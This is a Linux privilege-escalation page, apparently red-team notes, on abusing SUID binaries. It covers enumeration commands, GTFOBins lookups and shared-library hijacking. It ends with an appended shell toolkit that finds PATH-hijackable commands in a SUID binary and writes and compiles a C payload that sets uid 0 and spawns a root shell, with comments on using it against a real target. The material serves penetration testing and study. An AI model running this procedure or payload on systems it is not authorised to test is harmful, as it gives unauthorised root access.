# SUID Binaries

### Overview

SUID (Set User ID) is a permission bit on an executable that makes the resulting process run with the **effective user ID of the file's owner**, not that of the user who launched it. The real UID stays the caller's, which is why privilege-dropping checks in the spawned program matter later on.

### Why this Works

This technique works because:

* The SUID bit causes the binary to execute with its owner's privileges, i.e. as root when the file is root-owned
* Some binaries allow:
  * Shell escapes
  * Arbitrary command execution
  * File writes

### Prerequisites

For this PrivEsc path to work:

* Local access as a non-root user
* At least one root-owned SUID binary
* The binary must:
  * Be vulnerable, or
  * Support command execution/shell escape

### Steps

1. Enumerate SUID Binaries:

   ```bash
   find / -perm -4000 -type f 2>/dev/null
   find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
   find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} 2> /dev/null \;
   ```
2. Check whether [GTFOBins](https://gtfobins.org/) lists any of the SUID binaries you found; its SUID entries give the exact invocation that turns the binary into a root shell, a file read or a file write.

### Other paths of exploitation

1. Check whether any of the SUID binaries (custom or in-house ones included) is a version with a known privilege-escalation exploit; search Exploit-DB and GitHub for the binary name and version string.
2. Check whether the SUID binary finds all of its shared libraries, and whether any library is resolved from a directory **where we can write** (a missing library, or an RPATH/RUNPATH that points into a writable path). Trace the loader's file lookups to see which paths it tries:

   ```bash
   strace binary1 2>&1 | grep -i -E "open|access|no such file"
   ```

   If one of the paths the loader tries is missing or writable, drop a library of that name there and the SUID binary will load it as root (more details in Reference 1).

3. A new process **inherits a copy of its parent's environment variables**, including `PATH`: when the shell launches a program via `execve()`, it **passes its environment** to the child, and a SUID binary receives the same attacker-controlled environment (the dynamic loader strips `LD_PRELOAD` and `LD_LIBRARY_PATH` for SUID programs, but `PATH` goes through untouched). If the binary runs a command by bare name, e.g. `system("backup");`, that name is looked up in `PATH` in order, so an attacker who sets `export PATH=/tmp:$PATH` and places a malicious `backup` in `/tmp` gets it executed **with root privileges**. Two caveats: `system()` and `popen()` go through `/bin/sh -c`, and bash resets the effective UID to the real UID on startup when the two differ (dash does not), so where `/bin/sh` is bash this route usually fails, while a direct `execvp("backup", ...)` is hijackable regardless; and the planted `backup` must itself call `setuid(0)` or `setresuid(0, 0, 0)` before spawning a shell, since a shell script would lose the privilege the same way. A binary that uses a full path, such as `system("/usr/bin/backup")`, is not affected.

   ```bash
   # Look for commands the binary runs by bare name (no leading slash)
   strings binary2
   # Suppose it calls "backup": compile a replacement that calls setuid(0) and spawns a shell
   gcc -o /tmp/backup backup.c
   # Put the directory holding the fake "backup" first in PATH, then run the SUID binary
   export PATH=/tmp:$PATH
   ./binary2
   ```
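The PATH-hijack procedure above (and the enumeration it starts from), as an added example that is not part of the original page: a small set of POSIX shell helpers that list SUID/SGID files, pull bare command names out of a binary, walk a PATH string to find the first writable directory that would win the lookup, and write the privilege-re-asserting payload. The binary `fake_suid`, the command name `backup`, the temp directories and the sample strings are all constructed for the demo; the string extraction is a heuristic and should be confirmed with `strace`/`ltrace` on the real target. Run it as the low-privileged user, since root sees every directory as writable.

```shell
#!/bin/sh
# Added example (not from the original page): triage helpers for the PATH-hijack step.
# Every file name here (fake_suid, backup, the temp dirs) is constructed for the demo.

# Enumerate SUID/SGID files; -xdev keeps find off /proc and network mounts.
suid_list() {
  find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Printable strings from a binary (a stand-in for strings(1)), reduced to tokens that look
# like a bare command name: no slash, so PATH decides which file actually runs.
relative_commands() {
  LC_ALL=C tr -c '[:print:]' '\n' < "$1" \
    | awk '{ print $1 }' \
    | grep -E '^[A-Za-z0-9_][A-Za-z0-9_.-]+$' \
    | grep -Ev '^[A-Z0-9_]+$' \
    | sort -u
}

# Walk a PATH string in order and print the first directory the current user can write to
# that is reached before (or instead of) the real command.  A file named $1 planted there is
# what a relative system()/execvp() call in the SUID binary would execute.
hijack_dir() {   # $1 = command name, $2 = PATH string; exit 1 if no such position exists
  ( IFS=:
    for d in $2; do
      [ -z "$d" ] && d=.                                    # empty entry means "."
      [ -d "$d" ] && [ -w "$d" ] && { printf '%s\n' "$d"; exit 0; }
      [ -x "$d/$1" ] && exit 1                              # real command wins first
    done
    exit 1 )
}

# For each relative command a binary references, report where it could be hijacked.
hijack_report() {   # $1 = binary, $2 = PATH string (defaults to the caller's PATH)
  p="${2:-$PATH}"
  relative_commands "$1" | while IFS= read -r cmd; do
    d=$(hijack_dir "$cmd" "$p") && printf '%s: hijackable via %s\n' "$cmd" "$d"
  done
}

# Payload to plant under the winning name.  It must re-assert uid 0 itself: bash resets the
# effective uid to the real uid when they differ, so a plain shell script would lose root.
write_payload() {   # $1 = directory, $2 = command name; compiled when gcc is available
  cat > "$1/$2.c" <<'EOF'
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setresuid(0, 0, 0);   /* real, effective and saved uid all root: bash will not drop it */
    setresgid(0, 0, 0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 1;
}
EOF
  command -v gcc >/dev/null 2>&1 && gcc -o "$1/$2" "$1/$2.c"
}

# Demo on a constructed "binary" so the script runs anywhere.  Against a real target:
#   hijack_report /path/to/suid_binary        # then write_payload <dir> <name>
#   PATH=<dir>:$PATH /path/to/suid_binary     # the hijacked call now runs the payload as root
demo=$(mktemp -d)
mkdir "$demo/writable"
printf 'ELF\001\002\n/bin/ls\nbackup -q\ncat\n' > "$demo/fake_suid"
hijack_report "$demo/fake_suid" "/nonexistent/bin:$demo/writable"
write_payload "$demo/writable" backup || true
rm -rf "$demo"
```

`hijack_dir` treats a writable directory reached before the real command as a win even when the command exists later in `PATH`, which is exactly the ordering `execvp()` and `sh -c` follow; `/bin/ls` in the sample is ignored because an absolute path is not subject to the lookup at all.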

### References

1. <https://github.com/v4resk/red-book/blob/main/redteam/privilege-escalation/linux/suid-binaries.md#shared-library-hijacking>
